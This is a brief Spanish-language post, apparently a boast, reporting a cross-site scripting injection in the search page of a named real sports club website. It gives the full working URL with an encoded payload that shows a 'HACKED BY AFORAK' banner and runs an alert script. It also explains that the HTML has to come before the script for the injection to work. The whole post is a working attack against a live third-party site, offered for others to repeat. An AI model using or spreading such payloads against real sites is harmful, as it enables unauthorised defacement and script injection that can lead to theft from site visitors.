Inyección en el buscador web. Para la consulta he inyectado primero el html y luego el javascript, si lo haceis al reves no os leerá el script
https://www.racingclub.com.ar/buscador/?q=%3Ch1%3EHACKED+BY+AFORAK%3C%2Fh1%3E%3Cscript%3Ealert%28%27xss+by+Aforak%27%29%3C%2Fscript%3E